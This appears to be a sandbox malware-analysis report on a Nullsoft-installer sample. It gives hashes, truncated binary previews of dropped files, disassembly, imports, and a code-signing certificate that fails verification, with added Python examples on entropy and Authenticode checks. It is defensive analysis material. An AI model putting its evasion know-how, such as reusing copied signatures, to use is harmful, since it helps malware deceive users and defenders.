SHA1: 46E9ED1F123904934276A9C44FEE009AF3D8DBF2
SHA-256: 66C472499DFF5759EA709E4412008B09AAE9C8479FA325ECF47C9A5EA5776EBC
SHA-512: 37E425D409483B4D2B4D80B0AC0BC425EF9EA61D7167BEE507ABD63D78AAF86B998F58FAD5849FFA539875CBAD97A0958490B2488040EB07A034F6204D63739A
Malicious: false
Process: C:\Users\user\Desktop\file.exe
File Type: data
Category: dropped
Size (bytes): 49152
Entropy (8bit): 6.497908528078612
Encrypted: false
SSDEEP: 768:88yDJ6bV6ybE5gOHu1QVT+27QwpMydPBZwnNMYVt/Fk73An4V9D0+xDkIPpEmV3i:88yDGVFE5gOHu1CwCMIBZwneAJu7Qnsa
MD5: BE070B66DDEA4F0CDE50137E57909E34
SHA1: 7E19653A320CB3227153C7B725751C2B74A3697F
SHA-256: A1E1FD3DD8CC3A1E978EAB91C376AD040687CAD05D261301A6F7EADFE9A75FB2
SHA-512: B90FF1DF6A5B40B368373CFE0196CF632F11C20E676F52141628346933840B38B1DD96B0273CC3EC1711A1B7E0C6704E8B1304803A00DEE4098BCF3D7E8104FA
Malicious: false
                                                                                                                                                                                        Preview:T)M...................V.u.h4....6...t(.T)M............<...h...<...`.......X...V.u.h3....u...x.I..M.................u..E.P........4.I..E.Pj.h(...........H.I.........H.I..u....u.V..@.I....E.V........`.I....u..=.#M..u.j...j.....I....u..G...j..6..\.I......t.j...j.....I....#..........E.......~H.........<.u........<.......<.......<.......<................6..H.I.j...j.S..@.I......uM.......j.HPS..@.I......u4.......HPj.S..@.I......u........HP.......HPS..@.I...S.6..`.I........i....a...W.u.....I.j.W........8..)M.t.9..)M...2.....)M...tV..9.t..@...e...M.WSR...)M....)M....VQ...P......)M.....)M.....t.V..(M...............3.......E..[......t!I.....B.........P...PSV.Er.......QQV.g......WV..c......j...Q......P...PWV.q............P...PSV.ru...........PW...PV.._...j.........P...PV..h...........P...PSV.b...>....M.WSVQQ.}f...,...WSV..h......j..&...j............t......_...Q.........S.P...PV.if.......Q..j......S.P...PV.O].........t.I.WS..#M.h.......@)M..M.WSh...............V..x.I.....SV.$c...
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                        Entropy (8bit):6.562684485137087
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:vqmfyLGNZIEMHeoMmOrE2fKMg1S4gm4/O3JYHqJl/JJQJIokqmfqh+rg:BfhjLueoMmOrrHL/uDoiouK+rg
                                                                                                                                                                                        MD5:F35DEC335EF9E69710D927917B55E546
                                                                                                                                                                                        SHA1:88FC9B8C3B33C746E9A4DBD7A0CD752EC7B1375E
                                                                                                                                                                                        SHA-256:C377583FB2206D029ADD6182126EC7374BCDC27BAAA9C3E8C17F4D1842B7A8E2
                                                                                                                                                                                        SHA-512:67A6F0D517BFEFE6D8B7A1326F2EC8CAE2AC10E799536C47F9CDE93ADAE6CDBC41237471C7023FE5734A5A06B1177A3340C1F04C219F4D993BDF310A35B84096
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:......F........A...U.f;E.......jNXf;.......jGXf;....................A..AjNXf9E.u).y..u#j..E..M.PSV...:...........u.S......}.......t...B.Ph................M.U.R...P.....S......F......@.Ph.........E..e......e....VPS.u..E..................E....@....f.x..t...@...Pjr._.........E....f..A.......u.M..9...E...P.E.P.E.P.E.Pj..:......M......C....td....RtQ...t3...t ...t..M..E.P....'.u..M...D...2.M..E.P.......M..E.P.AD...u..M..:.....u..M...J...E.P.M.......]..{..u...j..W:...u.M...8...E..P.E.PS......M....%C...M..%l...K.u.M..8...E...P.E.P.E.P.E.P.u..S......M......B....t.......u..u.V...X......M...B...M...k...M..E...I..M....u......Y_^[....S..QQ......U.k..l$....X.S.VW.{..R..M.jH.....^.u......f9p..u.u..D......@.Pjp........7....s..M......73.}..M..E.G........@.f;E.u.B..f;E.u.J..j@_f;.}.u...t...x.F..{..E.VPW.E.M..M..M.P.E............y..M.........U.j@^...f9p.u.I.....jGX...L..P.@...u.....}...E.uYf.E..M.3.j.f.E..x@...}..u..E..@...3..M.E.E.P......P....s..E..WPj......M.E.......
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):58368
                                                                                                                                                                                        Entropy (8bit):6.625646895070276
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:xPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+1:eBiqXvpgF4qv+32eOyKODOSpQ1
                                                                                                                                                                                        MD5:84C2E74A644AA997AF6A5389BE8A5E12
                                                                                                                                                                                        SHA1:9BE822B2A46731991BF457FD856AFCF11B98AC58
                                                                                                                                                                                        SHA-256:A2F69512D8C1AB43296FF0D0D0C74D9120581C7DF5B51C03376B16DB071A6153
                                                                                                                                                                                        SHA-512:75BBF09A0BEB2FC1E8375109D007F0C101A1F4E9C0463A421AC637828B69DD0F21907A10FEEA1CAF7FA8F710D2CCEDCA3330DDC3C8BD87EB2958E4580640D3F6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:..A.<Zw.........J......3.E.......J....].....U..M..A.f..Zw.........J......3.E.......J....].....U..V.u....P..r....e..F...P."....Yu....P..r..Y..xu.....E.................F.......F..u.^]..U..QSV..M.Wj.Q.~....'..F..e..HP.....M.......F..8"t..E.;F.r..F.....2..?.u...t..._^[..].....U..QSV..M.Wj.Q.~....'..F..e.....P.]....M.......F..8"t..E.;F.r..F.....2..?.u...t..._^[..].....V..H..........u....^.S3.9^........:..........B...........^8.^......F.9^........v...F1..P.!....F....t....w..$..rB....X....E.N(..^$.^0.^ .^,.^<.8........'..........^(.!...A........................h....F....F1....k....F...P.....P......J....F.[^.I.\rB.erB.zrB..rB..rB..rB..rB..rB...V..H.........u....^.S3.9^...................&...........^8.^......F..9^........v...F2..P.6....F....t....w..$..tB....Z....E.N(..^$.^0.^ .^,.^<.8........'..........^(.!...L.........................g....F....f.F2f....g....F....P.....P......E....F.[^..ysB..sB..sB..sB..sB..sB..sB..sB...V..H.........u....^.S3.9^.........................
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                        Entropy (8bit):6.3761289670767
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:YN6MvI1hGOWrovtB81k8xAd8syJq7CQngD49EdWazm:iQ18OWrM81EyJqx9Edzm
                                                                                                                                                                                        MD5:7FBBE35DB8693990B14CEBBD28BCE879
                                                                                                                                                                                        SHA1:FD529B9836D8275399A160A3227AC15DEA1C4FC0
                                                                                                                                                                                        SHA-256:807ED5AC623035D54EEFD896CD6CC6F7569A27252DFA62FEE547CE9CFB8418D3
                                                                                                                                                                                        SHA-512:0F237671AE4138605D5256E34F67242D4004727753A01870460DBF5D681B4FC86C2877328D60D23723DE34927B95C88E76180380D16CE3EF428A283115AF73B7
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0
                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):947288
                                                                                                                                                                                        Entropy (8bit):6.630612696399572
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                        MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                        SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                        SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                        SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Joe Sandbox View:
• Filename: SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.PWSX-gen.28191.20359.exe, Detection: malicious
• Filename: 3hKak4Fdou.exe, Detection: malicious
• Filename: gaVr0jXXLk.exe, Detection: malicious
• Filename: BUpr7r9zdo.exe, Detection: malicious
• Filename: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe, Detection: malicious
• Filename: package80171530600.jpg.lnk, Detection: malicious
• Filename: QJwM0vJ5mk.exe, Detection: malicious
• Filename: 4U9frILl8q.exe, Detection: malicious
• Filename: 4U9frILl8q.exe, Detection: malicious
                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
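How the "Entropy (8bit)" values in the dropped-file entries above are computed, as an added example that is not part of the Joe Sandbox report: the figure is Shannon entropy in bits per byte (0.0 for a constant stream, 8.0 when every byte value is equally frequent). The "data" blobs dropped by file.exe sit around 6.4 to 6.6, which is what plain x86 code looks like, while the Nullsoft installer itself (below) is 7.98, which is what compressed or encrypted payload looks like. The functions below compute the metric for a whole buffer and across fixed windows so a compressed region inside an otherwise ordinary file stands out; the 7.9 threshold in looks_packed and the DEMO input are this example's own constructed choices, not values from the report.

```python
import math
from collections import Counter
from typing import List, Tuple


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant stream,
    8.0 when all 256 byte values occur equally often."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def entropy_map(data: bytes, window: int = 256, step: int = 256) -> List[Tuple[int, float]]:
    """Entropy of consecutive windows, so a compressed or encrypted region
    inside an otherwise ordinary file shows up as a run of high values.
    Returns (offset, entropy) pairs; the last window may be shorter."""
    return [(off, shannon_entropy(data[off:off + window]))
            for off in range(0, len(data), step)]


def looks_packed(data: bytes, threshold: float = 7.9) -> bool:
    """Whole-file heuristic: near-maximal entropy means compressed or
    encrypted content dominates the file. The threshold is this example's
    own choice; an NSIS archive and an encrypted payload both trip it, so it
    separates 'compressed' from 'plain', not 'malicious' from 'benign'."""
    return shannon_entropy(data) >= threshold


# Constructed demo input (not sample data): a zero-filled header, a block in
# which every byte value is equally represented (maximal entropy), then
# repeated ASCII text, which has low entropy like real strings do.
DEMO = (b"\x00" * 1024
        + bytes(range(256)) * 4
        + b"This program cannot be run in DOS mode" * 8)


if __name__ == "__main__":
    for off, e in entropy_map(DEMO):
        print(f"{off:#08x}  {e:5.2f}")
    print("whole file:", round(shannon_entropy(DEMO), 3), "packed:", looks_packed(DEMO))
```

Reading the per-window map is usually more useful than the single file-level number: a sample whose early windows look like code and whose tail is flat 8.0 typically carries an appended or embedded compressed payload, which is the shape an installer wrapper such as this NSIS sample has.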
                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                        Entropy (8bit):7.981687548666032
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                        File name:file.exe
                                                                                                                                                                                        File size:751'720 bytes
                                                                                                                                                                                        MD5:0c4cb8fd1e3cc4b42556562d317e6e59
                                                                                                                                                                                        SHA1:8a572e6ef21e54b76cf0b38099c6ca47d607170e
                                                                                                                                                                                        SHA256:e787e9b3eb07676a4848cb9ff1dad9a19a5b3aa11a220b2ba3d447ac6680abeb
                                                                                                                                                                                        SHA512:0b7c6520fe39261743cb6f85a601d9e7306a17e25b1909150a14cd4e31e5c2d9c0faef30effbd1dc1eb1108da53b0f6284d701ce37ab5cef5dbcf9a2f8634652
                                                                                                                                                                                        SSDEEP:12288:dXxKusPyZi+9cn2eIIcXopkUxTBdmEkH1Vmkw8dUfmBpHG9Yg1p8mgNahqYSkjQH:dXxKusaZi+9pI3xl1u1q/fmpnepSzYSr
                                                                                                                                                                                        TLSH:F3F42311B3F4E86AF5817F39BB786FA23DB4579C80C6144B7B600A24EC76163AD4612F
                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...c..d.................f...".....
                                                                                                                                                                                        Icon Hash:78d8dac6c491f270
                                                                                                                                                                                        Entrypoint:0x4034fc
                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                        Time Stamp:0x64A0DC63 [Sun Jul 2 02:09:39 2023 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                        Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                        Signature Issuer:CN=SSL.com Code Signing Intermediate CA RSA R1, O=SSL Corp, L=Houston, S=Texas, C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232 (HRESULT 0x80096010, TRUST_E_BAD_DIGEST: a signature block is present and parses, but the file's Authenticode hash no longer matches the digest that the signature covers, so the file was altered after it was signed or the certificate table was copied onto it from another file)
                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                        • 26/01/2024 10:49:23 25/01/2027 10:49:23
                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                        • CN=ObviousIdea, O=ObviousIdea, L=Castanet Tolosan, S=Occitanie, C=FR
                                                                                                                                                                                        Version:3
                                                                                                                                                                                        Thumbprint MD5:056DD2B9C64EB49C135AA03995F0E5F7
                                                                                                                                                                                        Thumbprint SHA-1:6CB5B490F195BE1887DAF56BDA2F897719D0E9B4
                                                                                                                                                                                        Thumbprint SHA-256:7B021E1D3B393FE7E31199C79CF7145EB900E5C165E76936D21B7D8202411CD3
                                                                                                                                                                                        Serial:4781773076BEE512F85C65F34E9B37C9
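What "did not verify" with error -2146869232 (0x80096010, TRUST_E_BAD_DIGEST) means mechanically, as an added example that is not part of the Joe Sandbox report: an Authenticode verifier hashes the whole file except the CheckSum field, the security data-directory entry and the certificate table itself, then compares that hash with the digest carried inside the PKCS#7 signature. The pure-Python script below implements that hashing rule and builds a constructed toy PE32 to show that flipping one bit of code changes the digest while swapping the certificate table or zeroing CheckSum does not, which is exactly why a signature lifted from a legitimate vendor's file fails on a different binary. The toy PE, its placeholder signature blob, and the section-layout simplification stated in the docstring are this example's assumptions; it does not parse the PKCS#7 to extract the signed digest, so the practical check on Windows remains Get-AuthenticodeSignature or signtool verify.

```python
import hashlib
import struct
from typing import Optional, Tuple

IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # data-directory slot of the certificate table


def hresult(err: int) -> str:
    """Render a signed 32-bit error number as the HRESULT it is usually quoted as."""
    return f"0x{err & 0xFFFFFFFF:08X}"


def security_directory(pe: bytes) -> Tuple[int, int, int]:
    """Return (CheckSum field offset, security directory entry offset, optional-header magic)."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    opt = e_lfanew + 4 + 20                        # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    dirs = opt + (96 if magic == 0x10B else 112)   # PE32 vs PE32+ data-directory start
    return opt + 64, dirs + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, magic


def authenticode_digest(pe: bytes, algo: str = "sha256") -> Tuple[str, Optional[bytes]]:
    """Hash the image the way an Authenticode verifier does: every byte except
    the CheckSum field, the security data-directory entry and the certificate
    table. Simplification (this example's assumption): sections sit in file
    order without gaps and the certificate table is the last thing in the
    file, as in normally linked binaries; the formal spec hashes sections
    sorted by PointerToRawData. Returns (hex digest, raw WIN_CERTIFICATE
    table or None when the file carries no signature)."""
    checksum_off, sec_off, _ = security_directory(pe)
    cert_off, cert_size = struct.unpack_from("<II", pe, sec_off)
    h = hashlib.new(algo)
    h.update(pe[:checksum_off])
    h.update(pe[checksum_off + 4:sec_off])
    if cert_size == 0:
        h.update(pe[sec_off + 8:])
        return h.hexdigest(), None
    h.update(pe[sec_off + 8:cert_off])
    h.update(pe[cert_off + cert_size:])
    return h.hexdigest(), pe[cert_off:cert_off + cert_size]


def build_minimal_pe(text: bytes, cert_blob: Optional[bytes]) -> bytes:
    """Constructed test data, not the sample: a toy PE32 with one .text section
    and, if cert_blob is given, a WIN_CERTIFICATE table appended at the end
    (the PKCS#7 content is a placeholder, not a real signature). Carries just
    enough structure for the digest logic above; it is not loadable."""
    ALIGN = 0x200
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0x64A0DC63, 0, 0, 224, 0x0102)
    hdr_end = 64 + 4 + 20 + 224 + 40
    raw_off = (hdr_end + ALIGN - 1) & ~(ALIGN - 1)
    raw_size = (len(text) + ALIGN - 1) & ~(ALIGN - 1)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                      # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, ALIGN)   # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x2000, raw_off)            # SizeOfImage, SizeOfHeaders
    struct.pack_into("<IHH", opt, 64, 0xDEADBEEF, 2, 0x8140)     # CheckSum, Subsystem GUI, DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                          # NumberOfRvaAndSizes
    win_cert = b""
    if cert_blob is not None:                                    # WIN_CERT_REVISION_2_0, PKCS_SIGNED_DATA
        win_cert = struct.pack("<IHH", 8 + len(cert_blob), 0x0200, 0x0002) + cert_blob
        struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY,
                         raw_off + raw_size, len(win_cert))
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, raw_size, raw_off,
                       0, 0, 0, 0, 0x60000020)
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect
    image += b"\0" * (raw_off - len(image)) + text + b"\0" * (raw_size - len(text))
    return image + win_cert


def demo() -> dict:
    """Digest of a signed toy file versus the same file with one code bit
    flipped, with CheckSum zeroed, and with a different certificate table."""
    code = b"\x55\x8b\xec\x83\xec\x10" * 8                       # constructed x86-looking bytes
    signed = build_minimal_pe(code, b"\x30\x82placeholder-pkcs7")
    good, cert = authenticode_digest(signed)
    patched = bytearray(signed)
    patched[signed.index(code)] ^= 0x01                          # one bit of .text changed
    zeroed = bytearray(signed)
    struct.pack_into("<I", zeroed, security_directory(signed)[0], 0)
    return {
        "signed": good,
        "patched": authenticode_digest(bytes(patched))[0],
        "checksum_zeroed": authenticode_digest(bytes(zeroed))[0],
        "swapped_cert": authenticode_digest(build_minimal_pe(code, b"\x30\x82another-vendor"))[0],
        "cert_len": len(cert),
    }


if __name__ == "__main__":
    print(hresult(-2146869232))
    for k, v in demo().items():
        print(f"{k:16} {v}")
```

Because the certificate table is outside the hashed region, any tool can append a signature block taken from a signed vendor binary onto an unrelated file and the file still "has a signature"; only the digest comparison, which is what failed here, tells the two cases apart. Treat "Digitally signed: true" with "Signature Valid: false" as a stronger indicator than an unsigned file, not a weaker one.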
Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F0044E1898Ah
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F0044E18958h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [00429AD8h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3a000 | 0x1890 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xb59d0 | 0x1e98 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6556 | 0x6600 | dd25e171f2e0fe45f2800cc9e162537d | False | 0.6652113970588235 | data | 6.456753840355455 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1358 | 0x1400 | f0b500ff912dda10f31f36da3efc8a1e | False | 0.44296875 | data | 5.102094016108248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x1fb38 | 0x600 | 2bc02714ee74ba781d92e94eeaccb080 | False | 0.501953125 | data | 4.040639308682379 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x10000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3a000 | 0x1890 | 0x1a00 | 4e1f44f57c1e72aa13be7b7dd21bb315 | False | 0.6350661057692307 | data | 5.864245238845219 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3a190 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.7420309653916212
RT_DIALOG | 0x3b2b8 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x3b3b8 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x3b4d8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x3b538 | 0x14 | data | English | United States | 1.05
RT_MANIFEST | 0x3b550 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
